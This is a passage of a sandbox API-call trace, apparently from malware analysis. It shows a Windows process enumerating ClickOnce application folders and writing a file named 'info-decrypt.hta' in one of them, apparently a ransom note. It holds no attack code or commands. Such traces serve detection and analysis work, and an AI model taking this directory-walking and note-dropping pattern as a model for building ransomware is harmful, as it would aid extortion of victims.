lpOldMode=0x949ebec) returned 1 [0153.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebf8) returned 1 [0153.139] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec2c) returned 1 [0153.139] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX", nBufferLength=0x105, lpBuffer=0x949e734, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX", lpFilePart=0x0) returned 0x41 [0153.139] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\", nBufferLength=0x105, lpBuffer=0x949e708, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\", lpFilePart=0x0) returned 0x42 [0153.139] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\*", lpFindFileData=0x949e954 | out: lpFindFileData=0x949e954*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.139] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.139] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YVORLGOR.PNT", cAlternateFileName="")) returned 1 [0153.140] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.140] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebec) returned 1 [0153.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebf8) returned 1 [0153.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ebdc) returned 1 [0153.140] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT", nBufferLength=0x105, lpBuffer=0x949e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT", lpFilePart=0x0) returned 0x4e [0153.140] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\", nBufferLength=0x105, lpBuffer=0x949e6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\", lpFilePart=0x0) returned 0x4f [0153.140] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\*", lpFindFileData=0x949e904 | out: lpFindFileData=0x949e904*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.307] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.307] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", cAlternateFileName="CLICEX~1.000")) returned 1 [0153.308] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", cAlternateFileName="GOOGAP~1.000")) returned 1 [0153.308] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="manifests", cAlternateFileName="MANIFE~1")) returned 1 [0153.308] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="manifests", cAlternateFileName="MANIFE~1")) returned 0 [0153.308] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb9c) returned 1 [0153.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eba8) returned 1 [0153.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ebdc) returned 1 [0153.310] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT", nBufferLength=0x105, lpBuffer=0x949e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT", lpFilePart=0x0) returned 0x4e [0153.310] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\", nBufferLength=0x105, lpBuffer=0x949e6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\", lpFilePart=0x0) returned 0x4f [0153.310] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\*", lpFindFileData=0x949e904 | out: lpFindFileData=0x949e904*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.311] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.311] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", cAlternateFileName="CLICEX~1.000")) returned 1 [0153.311] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", cAlternateFileName="GOOGAP~1.000")) returned 1 [0153.312] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="manifests", cAlternateFileName="MANIFE~1")) returned 1 [0153.312] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.312] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.313] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb9c) returned 1 [0153.313] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eba8) returned 1 [0153.313] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb8c) returned 1 [0153.313] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", nBufferLength=0x105, lpBuffer=0x949e694, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", lpFilePart=0x0) returned 0x8a [0153.313] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\", nBufferLength=0x105, lpBuffer=0x949e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\", lpFilePart=0x0) returned 0x8b [0153.313] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\*", lpFindFileData=0x949e8b4 | out: lpFindFileData=0x949e8b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.492] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.493] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a295a80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x113f58, dwReserved0=0x0, dwReserved1=0x0, cFileName="GoogleUpdateSetup.exe", cAlternateFileName="GOOGLE~1.EXE")) returned 1 [0153.493] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.493] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb4c) returned 1 [0153.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb58) returned 1 [0153.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb8c) returned 1 [0153.493] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", nBufferLength=0x105, lpBuffer=0x949e694, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", lpFilePart=0x0) returned 0x8a [0153.493] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\", nBufferLength=0x105, lpBuffer=0x949e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\", lpFilePart=0x0) returned 0x8b [0153.493] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\*", lpFindFileData=0x949e8b4 | out: lpFindFileData=0x949e8b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.494] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.494] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a295a80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x113f58, dwReserved0=0x0, dwReserved1=0x0, cFileName="GoogleUpdateSetup.exe", cAlternateFileName="GOOGLE~1.EXE")) returned 1 [0153.494] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a295a80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x113f58, dwReserved0=0x0, dwReserved1=0x0, cFileName="GoogleUpdateSetup.exe", cAlternateFileName="GOOGLE~1.EXE")) returned 0 [0153.494] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb4c) returned 1 [0153.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb58) returned 1 [0153.495] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe", nBufferLength=0x105, lpBuffer=0x949e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe", lpFilePart=0x0) returned 0xa0 [0153.495] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e608, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\info-decrypt.hta", lpFilePart=0x0) returned 0x9b [0153.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea68) returned 1 [0153.495] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949eae4 | out: lpFileInformation=0x949eae4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea64) returned 1 [0153.495] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe", nBufferLength=0x105, lpBuffer=0x949e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe", lpFilePart=0x0) returned 0xa0 [0153.495] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e4a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\info-decrypt.hta", lpFilePart=0x0) returned 0x9b [0153.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e99c) returned 1 [0153.495] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x45c [0153.696] GetFileType (hFile=0x45c) returned 0x1 [0153.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e998) returned 1 [0153.696] GetFileType (hFile=0x45c) returned 0x1 [0153.696] WriteFile (in: hFile=0x45c, lpBuffer=0x372a654*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x949ea60, lpOverlapped=0x0 | out: lpBuffer=0x372a654*, lpNumberOfBytesWritten=0x949ea60*=0x1000, lpOverlapped=0x0) returned 1 [0153.697] WriteFile (in: hFile=0x45c, lpBuffer=0x372a654*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x949ea34, lpOverlapped=0x0 | out: lpBuffer=0x372a654*, lpNumberOfBytesWritten=0x949ea34*=0x55e, lpOverlapped=0x0) returned 1 [0153.698] CloseHandle (hObject=0x45c) returned 1 [0153.698] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe", nBufferLength=0x105, lpBuffer=0x949e608, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe", lpFilePart=0x0) returned 0xa0 [0153.698] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eab4) returned 1 [0153.698] GetFileAttributesExW (in: 